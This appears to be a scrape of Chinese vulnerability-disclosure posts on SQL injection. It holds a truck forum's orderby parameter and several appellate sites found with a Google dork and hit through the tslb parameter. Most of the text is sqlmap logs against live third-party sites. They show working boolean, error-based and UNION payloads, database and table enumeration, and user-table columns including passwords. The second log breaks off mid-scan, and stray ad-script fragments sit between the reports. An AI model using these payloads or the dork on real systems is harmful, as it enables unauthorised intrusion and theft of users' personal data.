target url appears to be union select注入绕过injectable with 是否能注入

卡车之家论坛存在sql注入(泄露大量用户信息)
orderby参数存在注入
----------------------
root@attack:~# sqlmap -u &/clublist.php?clubid=57&orderby=lastpost&
___ ___| |_____ ___ ___ {1.0-dev-nongit-}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:35:59
[15:35:59] [INFO] testing connection to the target URL
[15:36:01] [INFO] testing if the target URL is stable
[15:36:01] [INFO] target URL is stable
[15:36:01] [INFO] testing if GET parameter 'clubid' is dynamic
[15:36:03] [INFO] confirming that GET parameter 'clubid' is dynamic
[15:36:04] [INFO] GET parameter 'clubid' is dynamic
[15:36:06] [WARNING] reflective value(s) found and filtering out
[15:36:07] [WARNING] heuristic (basic) test shows that GET parameter 'clubid' might not be injectable
[15:36:07] [INFO] testing for SQL injection on GET parameter 'clubid'
[15:36:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:36:15] [INFO] testing 'MySQL &= 5.0 boolean-based blind - Parameter replace'
[15:36:18] [INFO] testing 'MySQL &= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:36:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:36:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[15:36:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:36:32] [INFO] testing 'MySQL &= 5.0 error-based - Parameter replace'
[15:36:34] [INFO] testing 'MySQL inline queries'
[15:36:35] [INFO] testing 'PostgreSQL inline queries'
[15:36:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[15:36:38] [INFO] testing 'MySQL & 5.0.11 stacked queries (SELECT - comment)'
[15:36:41] [INFO] testing 'PostgreSQL & 8.1 stacked queries (comment)'
[15:36:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:36:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:36:50] [INFO] testing 'MySQL &= 5.0.12 AND time-based blind (SELECT)'
[15:36:53] [INFO] testing 'PostgreSQL & 8.1 AND time-based blind'
[15:36:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[15:37:00] [INFO] testing 'Oracle AND time-based blind'
[15:37:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[15:37:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[15:37:40] [INFO] target URL appears to be UNION injectable with 1 columns
[15:37:40] [WARNING] applying generic concatenation with double pipes ('||')
[15:37:42] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[15:37:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[15:38:35] [WARNING] GET parameter 'clubid' is not injectable
[15:38:35] [INFO] testing if GET parameter 'orderby' is dynamic
[15:38:35] [INFO] confirming that GET parameter 'orderby' is dynamic
[15:38:35] [WARNING] GET parameter 'orderby' does not appear dynamic
[15:38:35] [WARNING] heuristic (basic) test shows that GET parameter 'orderby' might not be injectable
[15:38:35] [INFO] testing for SQL injection on GET parameter 'orderby'
[15:38:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:38:40] [INFO] testing 'MySQL &= 5.0 boolean-based blind - Parameter replace'
[15:38:41] [INFO] GET parameter 'orderby' seems to be 'MySQL &= 5.0 boolean-based blind - Parameter replace' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[15:39:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:39:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:40:00] [INFO] checking if the injection point on GET parameter 'orderby' is a false positive
GET parameter 'orderby' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 267 HTTP(s) requests:
Parameter: orderby (GET)
Type: boolean-based blind
Title: MySQL &= 5.0 boolean-based blind - Parameter replace
Payload: clubid=57&orderby=(SELECT (CASE WHEN () THEN 2508 ELSE 2508*(SELECT 2508 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
[15:40:48] [INFO] the back-end DBMS is MySQL
web application technology:
5.6.14, Nginx
back-end DBMS: MySQL 5.0
[15:40:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'
[*] shutting down at 15:40:48
---------------------------------------------------------------------
current database: '360che'
-------------------------------------
Database: 360che
[247 tables]
+------------------------+
| bbsatt |
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_adaches |
| cdb_advertisements |
| cdb_album |
| cdb_announcements |
| cdb_api_qq |
| cdb_api_user |
| cdb_api_weixin |
| cdb_apply |
| cdb_applyapplies |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_auman_log |
| cdb_band |
| cdb_banned |
| cdb_bbcodes |
| cdb_beginmembers |
| cdb_beginmemdong |
| cdb_caches |
| cdb_calculator |
| cdb_campaigns |
| cdb_chebiao |
| cdb_checkin |
| cdb_checkin_1 |
| cdb_checkin_2 |
| cdb_checkin_3 |
| cdb_checkuser |
| cdb_clubre |
| cdb_complainlog |
| cdb_creditslog |
| cdb_crons |
| cdb_dailypoststj |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favorites |
| cdb_feedback |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_handworkcontent |
| cdb_hiddentie |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_logintel |
| cdb_loginthird |
| cdb_loginthirdtj |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_membermedals |
| cdb_members |
| cdb_memberspaces |
| cdb_memberspwd |
| cdb_membersrecords |
| cdb_moderators |
| cdb_modworks |
| cdb_mvisit |
| cdb_myposts |
| cdb_mytasks |
| cdb_mythreads |
| cdb_navs |
| cdb_newmembers |
| cdb_newpostcomment |
| cdb_online |
| cdb_onlinelist |
| cdb_onlinemember |
| cdb_onlinetime |
| cdb_onlinetourist |
| cdb_operation |
| cdb_opreason |
| cdb_oprecords |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_pms_jinggao |
| cdb_polloptions |
| cdb_polls |
| cdb_position |
| cdb_postcomment |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_register_log |
| cdb_relatedthreads |
| cdb_renzheng |
| cdb_renzheng_img |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_saveposts |
| cdb_searchfull |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_sgmembers |
| cdb_sgposts |
| cdb_sgthreads |
| cdb_shippingaddress |
| cdb_sjyz |
| cdb_smilies |
| cdb_spacecaches |
| cdb_specialuser |
| cdb_statistics |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_subscriptions |
| cdb_tags |
| cdb_tagsbakbak |
| cdb_tagstags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsclubread |
| cdb_threadsmod |
| cdb_threadspass |
| cdb_threadtags |
| cdb_threadtagsbak |
| cdb_threadtypes |
| cdb_tousu |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_tuigao |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usedcars |
| cdb_usergroups |
| cdb_validating |
| cdb_videos |
| cdb_videotags |
| cdb_virtualforums |
| cdb_warnings |
| cdb_words |
| checkin_1 |
| mobile |
| mobile_area_log_151110 |
| province |
| shouji |
| tianyamember |
| tmp_regstatistics |
| topic_inter_log |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_members |
| uc_members |
| uc_members_11 |
| uc_mergemembers |
| uc_newpm |
| uc_newpm_bak |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| wiki_aaa_answer |
| wiki_aaa_ask |
| wiki_activation |
| wiki_advertisement |
| wiki_attachment |
| wiki_autosave |
| wiki_banned |
| wiki_blacklist |
| wiki_block |
| wiki_category |
| wiki_categorylink |
| wiki_channel |
| wiki_comment |
| wiki_creditdetail |
| wiki_datacall |
| wiki_doc |
| wiki_docfavorite |
| wiki_docreference |
| wiki_edition |
| wiki_focus |
| wiki_friendlink |
| wiki_gift |
| wiki_giftlog |
| wiki_innerlinkcache |
| wiki_language |
| wiki_lock |
| wiki_mailqueue |
| wiki_nav |
| wiki_navlink |
| wiki_navmodel |
| wiki_plugin |
| wiki_pluginhook |
| wiki_pluginvar |
| wiki_pms |
| wiki_privatetitle |
| wiki_recycle |
| wiki_regular |
| wiki_regular_relation |
| wiki_regulargroup |
| wiki_relation |
| wiki_session |
| wiki_setting |
| wiki_synonym |
| wiki_task |
| wiki_theme |
| wiki_uniontitle |
| wiki_user |
| wiki_usergroup |
| wiki_visitlist |
| wiki_word |
+------------------------+
----------------------------------------------
[18:13:18] [INFO] retrieved: uid
[18:13:29] [INFO] retrieved: mediumint(8) unsigned
[18:14:42] [INFO] retrieved: username
[18:15:09] [INFO] retrieved: char(20)
[18:15:36] [INFO] retrieved: password
[18:16:08] [INFO] retrieved: char(32)
[18:16:35] [INFO] retrieved: email
[18:16:52] [INFO] retrieved: char(50)
[18:17:18] [INFO] retrieved: gender
[18:17:39] [INFO] retrieved: tinyint(1)
[18:18:12] [INFO] retrieved: credit2
[18:18:36] [INFO] retrieved: int(10)
[18:18:58] [INFO] retrieved: birthday
[18:19:26] [INFO] retrieved: int(10) unsigned
[18:20:24] [INFO] retrieved: image
[18:20:43] [INFO] retrieved: varchar(255)
[18:21:20] [INFO] retrieved: location
[18:21:48] [INFO] retrieved: varchar(30)
[18:22:23] [INFO] retrieved: regip
[18:22:46] [INFO] retrieved: char(15)
[18:23:11] [INFO] retrieved: regtime
[18:23:37] [INFO] retrieved: int(10) unsigned
[18:24:28] [INFO] retrieved: lastip
[18:24:51] [INFO] retrieved: char(15)
[18:25:35] [INFO] retrieved: lasttime
[18:26:17] [INFO] retrieved: int(10) unsigned
[18:27:09] [INFO] retrieved: groupid
[18:27:34] [INFO] retrieved: smallint(6) unsigned
[18:28:53] [INFO] retrieved: timeoffset
[18:29:29] [INFO] retrieved: varchar(20)
[18:30:08] [INFO] retrieved: style
[18:30:25] [INFO] retrieved: varchar(20)
[18:31:01] [INFO] retrieved: language
[18:31:29] [INFO] retrieved: varchar(20)
[18:32:07] [INFO] retrieved: signature
[18:32:39] [INFO] retrieved: text
[18:32:54] [INFO] retrieved: creates
[18:33:19] [INFO] retrieved: mediumint(8) unsigned
[18:34:28] [INFO] retrieved: edits
[18:34:46] [INFO] retrieved: mediumint(8) unsigned
[18:35:53] [INFO] retrieved: views
[18:36:09] [INFO] retrieved: int(10) unsigned
[18:37:01] [INFO] retrieved: checkup
[18:37:26] [INFO] retrieved: int^C
[18:37:39] [ERROR] user aborted
-------------------------------------------------------------
不知道这个库和卡车之家商城同一个库布 ,同一个库直接影响商城网站
----------------------------------
由于要上课了就不继续深入了,厂商有什么补充或者疑问可以联系我。rank能不能高一点。。。。。。
解决方案:
你们更专业.
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放(、、)
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
详细说明:
code 区域inurl:/appellate/appellate.do inurl:tslb=
注入参数tslb
举几个例子
code 区域注入地址:http://**.**.**.**/appellate/appellate.do?act=query&page=10&tslb
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 06:28:43
[06:28:44] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\**.**.**.**\session' as session file
[06:28:44] [INFO] resuming back-end DBMS 'oracle' from session file
[06:28:44] [INFO] testing connection to the target url
[06:28:45] [INFO] testing if the url is stable, wait a few seconds
[06:28:46] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[06:28:48] [INFO] testing if GET parameter 'act' is dynamic
[06:28:48] [INFO] confirming that GET parameter 'act' is dynamic
[06:28:49] [INFO] GET parameter 'act' is dynamic
[06:28:49] [WARNING] heuristic test shows that GET parameter 'act' might not be
injectable
[06:28:49] [INFO] testing sql injection on GET parameter 'act'
[06:28:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:28:52] [INFO] testing 'MySQL &= 5.0 AND error-based - WHERE or HAVING clause
[06:28:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:28:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[06:28:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:28:56] [INFO] testing 'MySQL & 5.0.11 stacked queries'
[06:28:58] [INFO] testing 'PostgreSQL & 8.1 stacked queries'
[06:28:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:29:00] [INFO] testing 'MySQL & 5.0.11 AND time-based blind'
[06:29:01] [INFO] testing 'PostgreSQL & 8.1 AND time-based blind'
[06:29:23] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:29:23] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. --flush-session --tech
nique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[06:29:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:29:26] [INFO] testing 'Oracle AND time-based blind'
[06:29:27] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[06:30:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:30:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:30:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:30:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:31:04] [WARNING] GET parameter 'act' is not injectable
[06:31:04] [INFO] testing if GET parameter 'page' is dynamic
[06:31:05] [WARNING] GET parameter 'page' appears to be not dynamic
[06:31:06] [WARNING] heuristic test shows that GET parameter 'page' might not be
injectable
[06:31:06] [INFO] testing sql injection on GET parameter 'page'
[06:31:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:31:21] [INFO] testing 'MySQL &= 5.0 AND error-based - WHERE or HAVING clause
[06:31:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:31:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[06:31:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:31:54] [INFO] testing 'MySQL & 5.0.11 stacked queries'
[06:31:58] [INFO] testing 'PostgreSQL & 8.1 stacked queries'
[06:32:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:32:06] [INFO] testing 'MySQL & 5.0.11 AND time-based blind'
[06:32:10] [INFO] testing 'PostgreSQL & 8.1 AND time-based blind'
[06:32:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:32:19] [INFO] testing 'Oracle AND time-based blind'
[06:32:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[06:33:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:34:08] [INFO] target url appears to be UNION injectable with 9 columns
[06:34:23] [WARNING] if UNION based SQL injection is not detected, please consid
er usage of option '--union-char' (e.g. --union-char=1) and/or try to force the
back-end DBMS (e.g. --dbms=mysql)
[06:34:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:34:45] [INFO] target url appears to be UNION injectable with 7 columns
[06:35:16] [INFO] target url appears to be UNION injectable with 8 columns
[06:35:54] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:36:17] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:36:45] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:37:04] [WARNING] GET parameter 'page' is not injectable
[06:37:04] [INFO] testing if GET parameter 'tslb' is dynamic
[06:37:05] [WARNING] GET parameter 'tslb' appears to be not dynamic
[06:37:06] [INFO] heuristic test shows that GET parameter 'tslb' might be inject
able (possible DBMS: Oracle)
[06:37:06] [INFO] testing sql injection on GET parameter 'tslb'
[06:37:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:37:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:37:18] [INFO] GET parameter 'tslb' is 'Oracle AND error-based - WHERE or HAV
ING clause (XMLType)' injectable
[06:37:18] [INFO] testing 'Oracle AND time-based blind'
[06:37:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:37:25] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for UNION query injection technique
[06:37:27] [INFO] target url appears to have 7 columns in query
[06:37:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:37:53] [INFO] GET parameter 'tslb' is 'Generic UNION query (NULL) - 1 to 10
columns' injectable
GET parameter 'tslb' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 385 HTTP(s) req
Place: GET
Parameter: tslb
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: act=query&page=10&tslb=1' AND 5278=(SELECT UPPER(XMLType(CHR(60)||C
HR(58)||CHR(100)||CHR(115)||CHR(114)||CHR(58)||(SELECT (CASE WHEN () TH
EN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(107)||CHR(106)||CHR(58)||CHR
(62))) FROM DUAL) AND 'FuLW'='FuLW
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: act=query&page=10&tslb=1' UNION ALL SELECT NULL, NULL, NULL, CHR(58
)||CHR(100)||CHR(115)||CHR(114)||CHR(58)||CHR(69)||CHR(70)||CHR(81)||CHR(77)||CH
R(106)||CHR(122)||CHR(79)||CHR(101)||CHR(102)||CHR(73)||CHR(58)||CHR(100)||CHR(1
07)||CHR(106)||CHR(58), NULL, NULL, NULL FROM DUAL--
AND 'ZJvB'='ZJvB
[06:38:36] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[06:38:36] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[06:38:36] [INFO] fetching database (schema) names
available databases [10]:
[*] CTXSYS
[*] HZ12345_WEB
[*] ODM_MTR
[*] OLAPSYS
[*] ORDSYS
[06:38:36] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\**.**.**.**'
[*] shutting down at 06:38:36
code 区域注入地址:http://**.**.**.**/hnweb/appellate/appellate.do?act=query&tslb=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 06:29:04
[06:29:05] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\**.**.**.**\session' as session file
[06:29:05] [INFO] testing connection to the target url
[06:29:06] [INFO] heuristics detected web page charset 'GB;
[06:29:06] [INFO] testing if the url is stable, wait a few seconds
[06:29:08] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[06:29:28] [INFO] testing if GET parameter 'act' is dynamic
[06:29:29] [INFO] confirming that GET parameter 'act' is dynamic
[06:29:29] [INFO] GET parameter 'act' is dynamic
[06:29:29] [WARNING] heuristic test shows that GET parameter 'act' might not be
injectable
[06:29:29] [INFO] testing sql injection on GET parameter 'act'
[06:29:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:29:32] [INFO] testing 'MySQL &= 5.0 AND error-based - WHERE or HAVING clause
[06:29:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:29:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[06:29:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:29:38] [INFO] testing 'MySQL & 5.0.11 stacked queries'
[06:30:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:30:01] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. --flush-session --tech
nique=BEUS) or try to lower the value of option '--time-sec' (e.g. --time-sec=2)
[06:30:02] [INFO] testing 'PostgreSQL & 8.1 stacked queries'
[06:30:24] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:30:26] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:30:28] [INFO] testing 'MySQL & 5.0.11 AND time-based blind'
[06:30:30] [INFO] testing 'PostgreSQL & 8.1 AND time-based blind'
[06:30:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:30:33] [INFO] testing 'Oracle AND time-based blind'
[06:30:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[06:30:58] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:31:24] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:31:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:31:35] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using the --dbms optio
[06:32:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:32:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:32:37] [WARNING] GET parameter 'act' is not injectable
[06:32:37] [INFO] testing if GET parameter 'tslb' is dynamic
[06:32:37] [INFO] confirming that GET parameter 'tslb' is dynamic
[06:32:38] [INFO] GET parameter 'tslb' is dynamic
[06:32:38] [INFO] heuristic test shows that GET parameter 'tslb' might be inject
able (possible DBMS: Oracle)
[06:32:38] [INFO] testing sql injection on GET parameter 'tslb'
[06:32:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:33:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:33:06] [INFO] GET parameter 'tslb' is 'AND boolean-based blind - WHERE or HA
VING clause' injectable
[06:33:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:33:06] [INFO] GET parameter 'tslb' is 'Oracle AND error-based - WHERE or HAV
ING clause (XMLType)' injectable
[06:33:06] [INFO] testing 'Oracle AND time-based blind'
[06:33:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'tslb' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 167 HTTP(s) req
Place: GET
Parameter: tslb
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=query&tslb=1' AND
AND 'XPGP'='XPGP
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: act=query&tslb=1' AND 2471=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||
CHR(109)||CHR(121)||CHR(105)||CHR(58)||(SELECT (CASE WHEN () THEN 1 ELS
E 0 END) FROM DUAL)||CHR(58)||CHR(98)||CHR(103)||CHR(117)||CHR(58)||CHR(62))) FR
OM DUAL) AND 'aqve'='aqve
[06:33:55] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[06:33:55] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[06:33:55] [INFO] fetching database (schema) names
[06:33:56] [INFO] the SQL query used returns 26 entries
[06:33:58] [INFO] retrieved: CTXSYS
[06:33:58] [INFO] retrieved: HN12345
[06:33:59] [INFO] retrieved: HN12345OLD
[06:34:00] [INFO] retrieved: HR
[06:34:00] [INFO] retrieved: MDSYS
[06:34:01] [INFO] retrieved: ODM
[06:34:01] [INFO] retrieved: ODM_MTR
[06:34:02] [INFO] retrieved: OE
[06:34:02] [INFO] retrieved: OLAPSYS
[06:34:03] [INFO] retrieved: ORDSYS
[06:34:03] [INFO] retrieved: OUTLN
[06:34:04] [INFO] retrieved: PM
[06:34:04] [INFO] retrieved: QS
[06:34:05] [INFO] retrieved: QS_CBADM
[06:34:06] [INFO] retrieved: QS_CS
[06:34:08] [INFO] retrieved: QS_ES
[06:34:09] [INFO] retrieved: QS_OS
[06:34:09] [INFO] retrieved: QS_WS
[06:34:10] [INFO] retrieved: RMAN
[06:34:10] [INFO] retrieved: SCOTT
[06:34:11] [INFO] retrieved: SH
[06:34:11] [INFO] retrieved: SYS
[06:34:12] [INFO] retrieved: SYSTEM
[06:34:12] [INFO] retrieved: WKSYS
[06:34:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[06:34:35] [INFO] retrieved: WMSYS
[06:34:35] [INFO] retrieved: XDB
available databases [26]:
[*] CTXSYS
[*] HN12345
[*] HN12345OLD
[*] ODM_MTR
[*] OLAPSYS
[*] ORDSYS
[*] QS_CBADM
[*] SYSTEM
[06:34:36] [INFO] Fetched data logged to text files under 'C:\Users\Administrato
r\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\**.**.**.**'
[*] shutting down at 06:34:36
code 区域注入地址:**.**.**.**:1234/appellate/appellate.jsessionid=5A727F9CA
3E281AD0C0B1B?act=query&tslb=1
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 06:39:32
[06:39:32] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\**.**.**.**\session' as session file
[06:39:32] [INFO] testing connection to the target url
[06:39:33] [INFO] testing if the url is stable, wait a few seconds
[06:39:35] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[06:39:36] [INFO] testing if GET parameter 'act' is dynamic
[06:39:37] [INFO] confirming that GET parameter 'act' is dynamic
[06:39:38] [INFO] GET parameter 'act' is dynamic
[06:39:38] [WARNING] heuristic test shows that GET parameter 'act' might not be
injectable
[06:39:38] [INFO] testing sql injection on GET parameter 'act'
[06:39:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:39:45] [INFO] testing 'MySQL &= 5.0 AND error-based - WHERE or HAVING clause
[06:39:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:39:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[06:39:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[06:39:54] [INFO] testing 'MySQL & 5.0.11 stacked queries'
[06:40:08] [INFO] testing 'PostgreSQL & 8.1 stacked queries'
